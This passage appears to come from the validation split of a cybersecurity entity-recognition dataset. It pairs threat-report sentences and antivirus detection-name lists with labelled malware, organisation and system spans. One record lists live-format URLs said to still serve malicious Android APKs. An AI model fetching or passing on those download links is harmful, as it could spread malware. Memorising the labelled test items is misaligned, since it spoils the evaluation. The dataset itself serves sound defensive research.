"System: Oracle Micros POS": [[179, 196]], "System: Point of Sale systems": [[236, 257]]}, "info": {"id": "cyner2_valid_001452", "source": "cyner2_valid"}} {"text": "In order to infect the victims, the attackers distributed spear-phishing emails containing malicious excel file which when opened dropped 
a malware capable of downloading additional components and spying on infected systems.", "spans": {"Organization: victims,": [[23, 31]], "Malware: malware": [[140, 147]], "System: infected systems.": [[207, 224]]}, "info": {"id": "cyner2_valid_001453", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.VaraminoR.Trojan P2P-Worm.Win32.Palevo!O TrojanDownloader.Small.AO6 W32/Palevo.eezd Trojan.Graftor.D479B Win.Trojan.Palevo-31897 Trojan-Downloader.Win32.Geral.boyj Trojan.Win32.Dwn.guudm Worm.Win32.A.P2P-Palevo.2115231 Troj.Downloader.W32.Geral!c Trojan.DownLoader5.26538 Dropper.StartPage.Win32.1147 Backdoor.Win32.Wuca TrojanDropper.StartPage.pr WORM/Palevo.HG.2 Win32/Palevo.NQ BScope.P2P-Worm.Palevo Win32.Trojan-downloader.Geral.Pfsq Worm.P2P.Palevo!loSA6JxZFd8 W32/Palevo.E!worm.p2p", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001454", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Vetor8933 Worm.Win32.Delf!O Trojan.Pazzky.A8 TROJ_PAZZKY.SM Win.Trojan.Delf-31409 Trojan.Win32.Scar.jxhs Trojan.Win32.Delf.bobvhf Troj.W32.Scar!c Win32.Trojan.Scar.Hqbv Worm.Win32.Delf.NJO Trojan.DownLoader6.22592 TROJ_PAZZKY.SM BehavesLike.Win32.Dropper.fc Worm/Delf.zj TR/Pazzky.A.164 Worm/Win32.Delf Trojan.Jacard.D13B1A Worm.Win32.A.Delf.350976[UPX] Trojan.Win32.Scar.jxhs Trojan:Win32/Pazzky.A Trojan/Win32.Downloader.R64664 TScope.Trojan.Delf Win32/Delf.NJO W32/Scar.JXHS!tr Trj/CI.A Win32/Worm.4b2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001455", "source": "cyner2_valid"}} {"text": "The Trojan gets the list of bank phone numbers from its C & C server .", "spans": {}, "info": {"id": "cyner2_valid_001456", "source": "cyner2_valid"}} {"text": "They have attacked more than 100 companies since January 2023.", "spans": {"Organization: companies": [[33, 42]]}, "info": {"id": "cyner2_valid_001457", "source": "cyner2_valid"}} {"text": "Through analysis of malicious code, files, and infrastructure it 
is clear the group behind this campaign is either directly responsible for or has cooperated with the group which conducted Operation Blockbuster Sequel and, ultimately, Operation Blockbuster originally outlined by researchers from Novetta.", "spans": {"Malware: malicious code,": [[20, 35]], "System: infrastructure": [[47, 61]], "Organization: researchers": [[280, 291]], "Organization: Novetta.": [[297, 305]]}, "info": {"id": "cyner2_valid_001458", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.DaislyC.Trojan Trojan.Nagram.S83339 Trojan.Downloader Trojan/Vabushky.a Win32.Trojan.WisdomEyes.16070401.9500.9902 W64/Trojan.AXTN-9138 Trojan.Ransomcrypt.E Trojan.Encoder.289 Trojan.Vabushky.Win64.4 BehavesLike.Win64.Trojan.qc Trojan:Win64/Alureon.L Dropper/Win64.Vabushky.R81451 Trojan.Win64.Vabushky Trj/CI.A Win64/Vabushky.A Trojan.Win64.Vabushky W64/Vabushky.A!tr Win32/Trojan.4b0", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001459", "source": "cyner2_valid"}} {"text": "It is typically distributed as a .jar Java archive attachment via spam emails see Figure 1 and relies on social engineering to convince a victim to execute the attachment.", "spans": {}, "info": {"id": "cyner2_valid_001460", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.Lunam!O Trojan.Lunam.A3 Trojan/Lunam.a Win32.Trojan.Otfrem.b W32/Trojan2.NMKU W32.SillyFDC.BCR Win32/SillyAutorun.EQP TROJ_LUNAM_0000000.TOMA Win.Trojan.Lunam-1 Trojan.Win32.Lunam.a Trojan.Win32.VB.mjwir Trojan.Win32.A.Lunam.476772 Trojan.Win32.FakeFolder.pb Win32.HLLW.Autoruner.48319 Trojan.Lunam.Win32.1 TROJ_LUNAM_0000000.TOMA BehavesLike.Win32.VBObfus.tm W32/Trojan.ZUUL-8834 Trojan/Lunam.b Trojan/Win32.Lunam Troj.W32.Lunam.tn6c Trojan.Win32.Lunam.a Trojan/Win32.Lunam.R2841 Trojan.VBO.012939 Win32/Otfrem.A Trojan.Win32.Lunam W32/Lunam.A!tr Worm.Win32.FakeFolder.CU", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001461", "source": 
"cyner2_valid"}} {"text": "It downloads the Poison Ivy malware onto the victim's computer and then launches it.", "spans": {"Malware: Poison Ivy malware": [[17, 35]], "System: the victim's computer": [[41, 62]]}, "info": {"id": "cyner2_valid_001462", "source": "cyner2_valid"}} {"text": "The Lookout Threat Intelligence team identified that this same Facebook profile has also posted Google Drive links to Android malware belonging to the FrozenCell family attributed to APT-C-27 .", "spans": {"Organization: Lookout Threat Intelligence": [[4, 31]], "Organization: Facebook": [[63, 71]], "System: Google Drive": [[96, 108]], "System: Android": [[118, 125]], "Malware: FrozenCell": [[151, 161]]}, "info": {"id": "cyner2_valid_001464", "source": "cyner2_valid"}} {"text": "In addition to the clicking activity , Judy displays a large amount of advertisements , which in some cases leave users with no option but clicking on the ad itself .", "spans": {"Malware: Judy": [[39, 43]]}, "info": {"id": "cyner2_valid_001465", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.eHeur.Malware10 Backdoor.Farfli.K7 Trojan.Farfli.Win32.13589 Trojan/Farfli.ek BKDR_ZEGOST.SMT Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_ZEGOST.SMT Win.Trojan.Nitol-6335025-0 Trojan.Win32.Farfli.bqoghb TrojWare.Win32.Magania.~AAD Trojan.DownLoader8.24132 BehavesLike.Win32.Dropper.wc BDS/Farfli.kj.2 Trojan.Spyrat.1 Backdoor:Win32/Farfli.O Trojan/Win32.OnlineGameHack.R9840 backdoor.win32.gh0st.ay Trojan.Farfli!Mc/Bw6h7dtA Trojan-GameThief.Win32.Magania W32/Farfli.AIL!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001467", "source": "cyner2_valid"}} {"text": "This unique on-device , just-in-time ( JIT ) approach inspired researchers to dub this malware as “ Agent Smith ” .", "spans": {"Malware: Agent Smith": [[100, 111]]}, "info": {"id": "cyner2_valid_001468", "source": "cyner2_valid"}} {"text": "Android services are components that can be made to 
execute independently in the background without the victim 's knowledge .", "spans": {"System: Android": [[0, 7]]}, "info": {"id": "cyner2_valid_001469", "source": "cyner2_valid"}} {"text": "Key individuals, who are believed to be part of a China-based attack group, have been stealing years of valuable government and corporate information from defense and high technology organizations in the US since 2013 and political and government-related entities in China, Hong Kong, and the Philippines since 2010.", "spans": {"Organization: individuals,": [[4, 16]], "Organization: government": [[113, 123]], "Organization: corporate information": [[128, 149]], "Organization: defense": [[155, 162]], "Organization: high technology organizations": [[167, 196]], "Organization: political": [[222, 231]], "Organization: government-related entities": [[236, 263]]}, "info": {"id": "cyner2_valid_001470", "source": "cyner2_valid"}} {"text": "After months of investigation, we found that several undisclosed malware and interesting tools used for exfiltration purposes were used in this campaign.", "spans": {"Malware: malware": [[65, 72]], "Malware: tools": [[89, 94]]}, "info": {"id": "cyner2_valid_001471", "source": "cyner2_valid"}} {"text": "These targets include privatized government agencies and government contractors, as well as companies in the consumer electronics, computer, healthcare, and financial industries.", "spans": {"Organization: privatized government agencies": [[22, 52]], "Organization: government contractors,": [[57, 80]], "Organization: companies": [[92, 101]], "Organization: consumer electronics, computer, healthcare,": [[109, 152]], "Organization: financial industries.": [[157, 178]]}, "info": {"id": "cyner2_valid_001472", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Script.Dwn.eqrgom Trojan.KLZM-7 TrojanDownloader:JS/NeutrinoEK.Y virus.js.qexvmc.1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001473", "source": 
"cyner2_valid"}} {"text": "] com hxxp : //sagawa-reg [ .", "spans": {}, "info": {"id": "cyner2_valid_001474", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32/Trojan.673", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001475", "source": "cyner2_valid"}} {"text": "In the early days of malware, we all remember analyzing samples of IRC botnets that were relatively simple, where the malware would connect to a random port running IRC, joining the botnet and waiting for commands from their leader.", "spans": {"Malware: malware,": [[21, 29]], "Malware: IRC botnets": [[67, 78]], "Malware: malware": [[118, 125]], "Malware: botnet": [[182, 188]]}, "info": {"id": "cyner2_valid_001476", "source": "cyner2_valid"}} {"text": "Based on this information , Talos assesses with high confidence that the malware is the same and this is , in fact , the Gustuff malware .", "spans": {"Organization: Talos": [[28, 33]], "Malware: Gustuff": [[121, 128]]}, "info": {"id": "cyner2_valid_001477", "source": "cyner2_valid"}} {"text": "This method allows Dridex to perform sneaky injections to evade AV solutions.", "spans": {"Malware: Dridex": [[19, 25]], "System: AV": [[64, 66]]}, "info": {"id": "cyner2_valid_001478", "source": "cyner2_valid"}} {"text": "Wallex is a modular trojan that can download modules from a remote C&C", "spans": {"Malware: Wallex": [[0, 6]], "Malware: trojan": [[20, 26]]}, "info": {"id": "cyner2_valid_001479", "source": "cyner2_valid"}} {"text": "A backdoor also known as: JS.Locky.JI VBS/Downldr.HM VB:Trojan.Downloader.JTTI VB:Trojan.Downloader.JTTI Trojan.Script.Vbs-heuristic.druvzi VB:Trojan.Downloader.JTTI VBS.DownLoader.983 Trojan-Ransom.Script.Locky", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001480", "source": "cyner2_valid"}} {"text": "Droppers Per Device Avg .", "spans": {}, "info": {"id": "cyner2_valid_001482", "source": "cyner2_valid"}} {"text": "These names are mainly related to the 
propagation of the Trojan, attack activities, such as the initial use of the Driver Life Update Server for propagation, the use of the Eternal Blue vulnerability in the target system, C2 communication and PowerShell script code with the Lemon Duck string, etc.", "spans": {"Vulnerability: the Driver Life Update Server": [[111, 140]], "Vulnerability: the Eternal Blue vulnerability": [[169, 199]], "System: system,": [[214, 221]], "Malware: the Lemon Duck string,": [[271, 293]]}, "info": {"id": "cyner2_valid_001483", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32/Paroc.b Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Paroc.Worm WORM_PAROC.B Win.Worm.Paroc-1 Email-Worm.Win32.Paroc.b Trojan.Win32.Paroc.enlr I-Worm.Win32.Paroc.12288.B Win32.Prosac.12288 Worm.Paroc.Win32.2 WORM_PAROC.B BehavesLike.Win32.FDoSBEnergy.lz W32/Paroc.B I-Worm/Paroc.b WORM/Paroc.B Worm[Email]/Win32.Paroc Worm:Win32/Paroc.A@mm W32.W.Paroc.b!c Email-Worm.Win32.Paroc.b Worm/Win32.Paroc.R55629 Worm.Paroc Win32/Paroc.B I-Worm.Paroc!Wvi+tOd6Ue8 Email-Worm.Win32.Paroc W32/Paroc.B!worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001484", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Rimecud.BB Win32.Trojan.WisdomEyes.151026.9950.9999 WORM_PALEVO.SMQM Trojan.Win32.ULPM.cykics Malware.FakeFolder@CV!1.6ABF Trojan.Packed.21635 WORM_PALEVO.SMQM BehavesLike.Win32.Rimecud.dt Trojan/Sasfis.unb Trojan.Razy.DB256 Trojan:Win32/Rimecud.A Worm/Win32.Palevo BScope.P2P-Worm.Palevo Virus.Win32.Virut W32/Palevo.CQQA!worm.p2p Trj/Rimecud.a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001485", "source": "cyner2_valid"}} {"text": "This practice can be enforced by unchecking the \" Unknown Sources '' option under the \" Security '' settings of your device .", "spans": {}, "info": {"id": "cyner2_valid_001486", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Heur.DP.rmIfaqjr92e 
Backdoor:Win32/Kazakiwhale.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001487", "source": "cyner2_valid"}} {"text": "Interestingly , early “ clean ” versions contain varying levels of signals that the updates will include malicious code later .", "spans": {}, "info": {"id": "cyner2_valid_001488", "source": "cyner2_valid"}} {"text": "At least one observed phishing lure delivered a Cobalt Strike payload.", "spans": {"Malware: a Cobalt Strike payload.": [[46, 70]]}, "info": {"id": "cyner2_valid_001489", "source": "cyner2_valid"}} {"text": "It is being used as a launch platform for APT actors including the now well-known Shell_Crew / Deep Panda group.", "spans": {}, "info": {"id": "cyner2_valid_001490", "source": "cyner2_valid"}} {"text": "This post will also give you insights about the level of sophistication this malware has reached.", "spans": {}, "info": {"id": "cyner2_valid_001492", "source": "cyner2_valid"}} {"text": "These emails are part of a wave of malware-ridden spam attacks that are currently active in Japan.", "spans": {}, "info": {"id": "cyner2_valid_001493", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Hupigon.YBO Backdoor.Win32.Hupigon.pv Backdoor.Hupigon.YBO Backdoor.Hupigon.YBO BackDoor.Pigeon.194 Trojan-Downloader.Win32.Delf.bcz!IK Backdoor/Hupigon.rsp Backdoor.Hupigon.YBO Virus.Win32.Heur.c Trojan-Downloader.Win32.Delf.aup Backdoor.Win32.Gpigeon2008.acj Trojan-Downloader.Win32.Delf.bcz", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001494", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.JavaNVA.Worm Trojan.Maljava Java/Trupto.A JAVA_CRAT.A Backdoor.Java.CrossRAT.b Trojan.Java.CrossRAT.exmvuo Backdoor.Java.Crossrat!c Java.CrossRat.1 JAVA_CRAT.A Backdoor.Java.gl Java/Trupto.A!tr Backdoor.Java.CrossRAT.b Trojan:Java/Trupto.A Backdoor.Java.CrossRAT Java.Backdoor.Crossrat.Ebqt Backdoor.Java.CrossRat virus.java.crossrat.1", "spans": {"Malware: 
backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001495", "source": "cyner2_valid"}} {"text": "This contained malware that we detect as Backdoor:W32/Wonknu.A.", "spans": {"Malware: malware": [[15, 22]]}, "info": {"id": "cyner2_valid_001496", "source": "cyner2_valid"}} {"text": "It is unclear whether this means early samples were targeting Arabic speakers or if the developers behind it are fluent in Arabic .", "spans": {}, "info": {"id": "cyner2_valid_001497", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.C01D Trojan-Downloader.Win32.Bredolab W32.W.Joleee.kZ0o Trojan/Pakes.nmc WORM_PKOOBF.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Bredolab.JO WORM_PKOOBF.SM Trojan.Win32.Pakes.nmc Trojan.Win32.MLW.ejone Trojan.Win32.Pakes.29184.I Trojan.Packed.19706 Trojan.Pakes.Win32.79 Trojan/Pakes.gyk Trojan.Win32.Pakes.nmc TrojanDownloader:Win32/Bredolab.X TrojanDownloader.Bredolab Trojan-Downloader.Win32.Bredolab Win32/TrojanDownloader.Bredolab.AA Trojan-Downloader.Win32.Bredolab", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001498", "source": "cyner2_valid"}} {"text": "A backdoor also known as: VB:Trojan.VBS.Downloader.ACP O97M.Downloader.AJK VB:Trojan.VBS.Downloader.ACP Doc.Downloader.Jaff-6316585-1 VB:Trojan.VBS.Downloader.ACP VB:Trojan.VBS.Downloader.ACP VB:Trojan.VBS.Downloader.ACP VB:Trojan.VBS.Downloader.ACP W97M.DownLoader.1738 HEUR_VBA.O2 W97M/Downloader.byw TrojanDownloader:JS/Swabfex.P VB:Trojan.VBS.Downloader.ACP W97M/Downloader.byw OLE.Win32.Macro.703738 WM/Moat.F1678919!tr virus.office.obfuscated.1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001499", "source": "cyner2_valid"}} {"text": "What's interesting to note is that some compromised sites have more value than others and this is especially true when those sites happen to be used to serve ad banners.", "spans": {}, "info": {"id": "cyner2_valid_001500", "source": "cyner2_valid"}} {"text": "A backdoor also known as: 
Trojan.Facetake Trojan.Win32.Fbtaken.ewtnbc Trojan.MSIL.Fbtaken W32/Trojan.KQVO-5134 Trojan.MSILPerseus.D9A09 Trojan:Win32/Facetake.A Trj/GdSda.A Trojan.Fbtaken! MSIL/Fbtaken.B!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001501", "source": "cyner2_valid"}} {"text": "When considered holistically, the intelligence supports the conclusion that this exploitation campaign was purposefully carried out against the backdrop of diplomatic and legal maneuvering.", "spans": {"Organization: intelligence": [[34, 46]]}, "info": {"id": "cyner2_valid_001503", "source": "cyner2_valid"}} {"text": "A backdoor also known as: PUP.PennyBee/Variant Trojan.Symmi.D12F46 Multi.Threats.InArchive Trojan.Win32.Patcher.zw Trojan.Win32.Kazy.dzllhn TrojWare.Win32.Addrop.SHHH Trojan.Lyrics.1951 Trojan-Dropper.Win32.Addrop TR/Taranis.1328 Trojan:Win32/Cuffahlt.C Trojan.Win32.Patcher.zw PUP/Win32.Pennybee.R164339 Trojan.Patcher PUP.Optional.PennyBee Win32/TrojanDropper.Addrop.AB Trojan.DR.Addrop!", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001504", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Scar.451584.C Trojan.Win32.Scar!O BackdoorAPT.Mourdoor.A5 Trojan/Scar.fhql Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/Trojan.ZFRS-4713 Backdoor.Moudoor Win32/Scar.AAJ Win.Trojan.Scar-835 Trojan.Win32.Scar.fhql Trojan.Win32.Scar.vgdwe Trojan.Win32.A.Scar.451584 Troj.W32.Scar.fhql!c Backdoor:W32/Moudoor.C Trojan.KillProc.14145 Trojan.Scar.Win32.61385 Backdoor.Win32.Moudoor Trojan/Scar.aodk BDS/Moudoor.A.8 W32/Scar.EB!tr Trojan[Backdoor]/Win32.Inject Win32.Troj.Scar.kcloud Trojan.Graftor.D30C3 Trojan.Win32.Scar.fhql Backdoor:Win32/Moudoor.A Trojan/Win32.Scar.C156340 BScope.Trojan.SvcHorse.01643 Trj/CI.A Win32.Trojan.Scar.Lqor Trojan.Scar!rOTamJh5gBg", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001508", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Application.Tool.5276 
Trojan/W32.HackTool.159744 Tool.NTScan.Win32.26 Aplicacion/NTScan.100 W32/Downloader.BAPG Hacktool.Scan HV_NTSCAN_CA226216.TOMC Application.Tool.5276 not-a-virus:NetTool.Win32.NTScan.100 Application.Tool.5276 Riskware.Win32.NTScan.ifni Nettool.W32.Ntscan!c Win32.Hacktool.Eq.Hpe Application.Tool.5276 ApplicUnsaf.Win32.NetTool.NTScan.kju Application.Tool.5276 Tool.Ntscan W32/Downloader.RYJZ-9055 SPR/NTScan.100 HackTool[NetTool:not-a-virus]/Win32.NTScan Win32.HackTool.NtScan.a.kcloud Application.Tool.D149C NetTool.NTScan.159744.K[h] HackTool:Win32/Ntscan.A Win-AppCare/Hacktool.159744.B Hacktool.Win32.NTScan.100 not-a-virus:NetTool.Win32.NTScan Exploit/Lsass.L Win32/Virus.NetTool.871", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001509", "source": "cyner2_valid"}} {"text": "It also specifically seeks to harvest game credentials for UPlay, Minecraft, Steam, and Origin.", "spans": {"Organization: UPlay, Minecraft, Steam,": [[59, 83]], "Organization: Origin.": [[88, 95]]}, "info": {"id": "cyner2_valid_001510", "source": "cyner2_valid"}} {"text": "Gets confirmation, and then—addresses of two servers.", "spans": {"System: two servers.": [[41, 53]]}, "info": {"id": "cyner2_valid_001511", "source": "cyner2_valid"}} {"text": "This adds an extra layer against detection .", "spans": {}, "info": {"id": "cyner2_valid_001512", "source": "cyner2_valid"}} {"text": "By manipulating a SQLite database , Exodus is able to keep itself running even when the screen goes off and the application would otherwise be suspended to reduce battery consumption .", "spans": {"Malware: Exodus": [[36, 42]]}, "info": {"id": "cyner2_valid_001513", "source": "cyner2_valid"}} {"text": "In this latest campaign we observed a total of 20 unique emails between June and August of this year that included two new variants of the CMSTAR Downloader.", "spans": {"Malware: variants": [[123, 131]], "Malware: the CMSTAR Downloader.": [[135, 157]]}, "info": {"id": "cyner2_valid_001514", 
"source": "cyner2_valid"}} {"text": "Since early 2014, an attacker group of Iranian origin has been actively targeting persons of interest by means of malware infection, supported by persistent spear phishing campaigns.", "spans": {"Malware: malware": [[114, 121]], "Malware: spear phishing campaigns.": [[157, 182]]}, "info": {"id": "cyner2_valid_001515", "source": "cyner2_valid"}} {"text": "Once opened, the document contacts a control server to drop the first stage of the malware, Seduploader, onto a victim's system.", "spans": {"System: a control server": [[35, 51]], "Malware: malware, Seduploader,": [[83, 104]], "System: a victim's system.": [[110, 128]]}, "info": {"id": "cyner2_valid_001516", "source": "cyner2_valid"}} {"text": "Unlike other rooting malware , this Trojan not only installs its modules into the system , it also injects malicious code into the system runtime libraries .", "spans": {}, "info": {"id": "cyner2_valid_001517", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Android.Trojan.FakeApp.AT Android.Gluper.A Android.Trojan.FakeApp.AT TROJ_FRS.0NA003GL17 HEUR:Trojan.AndroidOS.Rootnik.ay A.L.Rog.AdiEpln Troj.Androidos.Rootnik!c Trojan.Android.Gluper.a Trojan:Android/FakeApp.AC Android.HiddenAds.48.origin TROJ_FRS.0NA003GL17 Trojan/Android.Rootnik HEUR:Trojan.AndroidOS.Rootnik.ay Backdoor:AndroidOS/Coca.A Android.Trojan.FakeApp.AT", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001518", "source": "cyner2_valid"}} {"text": "The fake bitmap image embedded as resource The 32-bit stage 2 malware uses a customized loading mechanism ( i.e. 
, the PE file has a scrambled IAT and relocation table ) and exports only one function .", "spans": {}, "info": {"id": "cyner2_valid_001519", "source": "cyner2_valid"}} {"text": "Take pictures with the embedded camera .", "spans": {}, "info": {"id": "cyner2_valid_001520", "source": "cyner2_valid"}} {"text": "TA499, also known as Vovan and Lexus, is a Russia-aligned threat actor that has aggressively engaged in email campaigns since at least 2021.", "spans": {}, "info": {"id": "cyner2_valid_001523", "source": "cyner2_valid"}} {"text": "This blog describes the functionality of ZXShell, as well as the associate rootkits.", "spans": {"Malware: ZXShell,": [[41, 49]], "Malware: the associate rootkits.": [[61, 84]]}, "info": {"id": "cyner2_valid_001525", "source": "cyner2_valid"}} {"text": "It ’ s a complicated puzzle that can be solved by skilled reverse engineers only with good amount of time , code , automation , and creativity .", "spans": {}, "info": {"id": "cyner2_valid_001527", "source": "cyner2_valid"}} {"text": "We found no evidence of it being sold or distributed via underground marketplaces or forums.", "spans": {}, "info": {"id": "cyner2_valid_001528", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.TarsipMLTD.Trojan Trojan-Downloader.Win32.Small!O Backdoor.Goolelo Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Downbot Trojan-Downloader.Win32.Small.cdmv Trojan.Win32.10240.lcfja Trojan.DownLoad3.5643 Downloader.Small.Win32.55450 W32/Trojan.WWBK-0123 TrojanDownloader.Small.bsls TR/Spy.10240.111 Trojan-Downloader.Win32.Small.cdmv Backdoor:Win32/Goolelo.A Downloader/Win32.Small.R103572 Trojan.Downloader.Small.dkfq TrojanDownloader.Small Win32.Trojan-downloader.Small.Airx Trojan.DL.Small!YyNlwcptazw Trojan-Downloader.Win32.Small", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001529", "source": "cyner2_valid"}} {"text": "Crypto ransomware affecting Australian computers uses Breaking Bad theme in ransom demand.", 
"spans": {"Malware: Crypto ransomware": [[0, 17]], "System: Australian computers": [[28, 48]]}, "info": {"id": "cyner2_valid_001531", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Android.Shedun.E Android.Trojan-Dropper.Shedun.b Other:Android.Reputation.2 A.L.Rog.SexVideo.EI Trojan.Android.MLW.ebzlbe Android.DownLoader.329.origin Trojan[Dropper]/Android.Shedun.v Android-PUP/SmsPay.72a8b a.gray.tatic Trojan-Dropper.AndroidOS.Shedun Android/Piom.JO!tr Win32/Trojan.ecf", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001532", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Refroso.615936.D Trojan-Proxy.Win32.Banker!O Trojan.Banload Trojan.Zusy.D2500 TROJ_SPNR.35CB13 Win32.Trojan.WisdomEyes.16070401.9500.9993 TROJ_SPNR.35CB13 Trojan-Proxy.Win32.Banker.bv Trojan.Win32.Refroso.tsqgp Trojan.AVKill.20451 BehavesLike.Win32.Trojan.jc Win32.Malware Trojan/Refroso.aglg TrojanProxy:Win32/Yakyord.A Trojan-Proxy.Win32.Banker.bv Trojan/Win32.Refroso.R30410 Trojan.ChePro Trojan.ProxyChanger.EX Trojan.ChePro!ZtCA13Hkpps W32/ChePro.ASE!tr Win32/Trojan.e6d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001533", "source": "cyner2_valid"}} {"text": "Some of the targets are diplomatic or have strategic commercial interests.", "spans": {}, "info": {"id": "cyner2_valid_001534", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Obator.Win32.1 Trojan/Spy.Obator.a Trojan.Win32.Obator.dllhps Infostealer.Obator TROJ_OBATOR.J TrojanSpy.Obator! 
Trojan.Win32.Z.Obator.53262[h] Trojan.PWS.Spy.19227 TROJ_OBATOR.J W32/Trojan.SXYF-8193 TR/Spy.Obator.53262 W32/Obator.A!tr.spy Backdoor:Win32/Mizzmo.B Trojan.Win32.Obator.A Win32/Spy.Obator.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001535", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Notestuk BKDR_TURNEDUP.SM Trojan.Win32.Changeling.dgpyeo TrojWare.Win32.Changeling.QUK Trojan.DownLoader23.8554 Trojan.Inject.Win32.81036 BKDR_TURNEDUP.SM BehavesLike.Win32.Injector.fh Trojan.Changeling TR/Changeling.A.3949 Trojan.Zusy.D33795 Trojan:Win32/Hombot.A!dha Trojan/Win32.Dynamer.R198258 Trojan.Changeling! Win32/Trojan.d6e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001537", "source": "cyner2_valid"}} {"text": "Malicious URL Referrer Dates http : //217.194.13.133/tre/internet/Configuratore_3.apk http : //217.194.13.133/tre/internet/ 2015-02-04 to present time http : //217.194.13.133/appPro_AC.apk – 2015-07-01 http : //217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html 2015-01-20 to present time http : //217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone % 20Configuratore.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html currently active http : //vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk http : //vodafoneinfinity.sytes.net/tim/internet/ 2015-03-04 http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ 2015-01-14 http : //windupdate.serveftp.com/wind/LTE/WIND % 20Configuratore % 20v5_4_2.apk http : //windupdate.serveftp.com/wind/LTE/ 2015-03-31 http : //119.network/lte/Internet-TIM-4G-LTE.apk http : 
//119.network/lte/download.html 2015-02-04 2015-07-20 http : //119.network/lte/Configuratore_TIM.apk 2015-07-08 Many of these domains are outdated , but almost all ( except one – appPro_AC.apk ) samples located on the 217.194.13.133 server are still accessible .", "spans": {}, "info": {"id": "cyner2_valid_001538", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.151026.9950.9998 TROJ_DOFOIL.SM03 Trojan.Win32.DownLoad3.duajvs TrojWare.Win32.Joinkjot.SRG Trojan.DownLoad3.34193 TROJ_DOFOIL.SM03 BehavesLike.Win32.Downloader.lh Trojan/Sharik.ph W32/Dropper.CZE!tr Dropper/Win32.Necurs.N1311561930 Win32/Tnega.NAOXKOB Hoax.Blocker Trj/CI.A Win32.Backdoor.Napolar.Edyd Inject2.AWXI Trojan.Win32.Injector.BMIZ Win32/Backdoor.9ba", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001539", "source": "cyner2_valid"}} {"text": "Attackers targeting Far Eastern International Bank FEIB, a commercial firm in Taiwan, moved funds from its accounts to multiple overseas beneficiaries.", "spans": {"Organization: Far Eastern International Bank FEIB,": [[20, 56]], "Organization: commercial firm": [[59, 74]], "Organization: multiple overseas beneficiaries.": [[119, 151]]}, "info": {"id": "cyner2_valid_001540", "source": "cyner2_valid"}} {"text": "The user's stolen data is sent to the cybercriminals.", "spans": {"Organization: user's": [[4, 10]]}, "info": {"id": "cyner2_valid_001541", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.RansomKD.12603969 A.H.Rog.Myavoda Android.Malware.Trojan Android.Trojan.SLocker.F 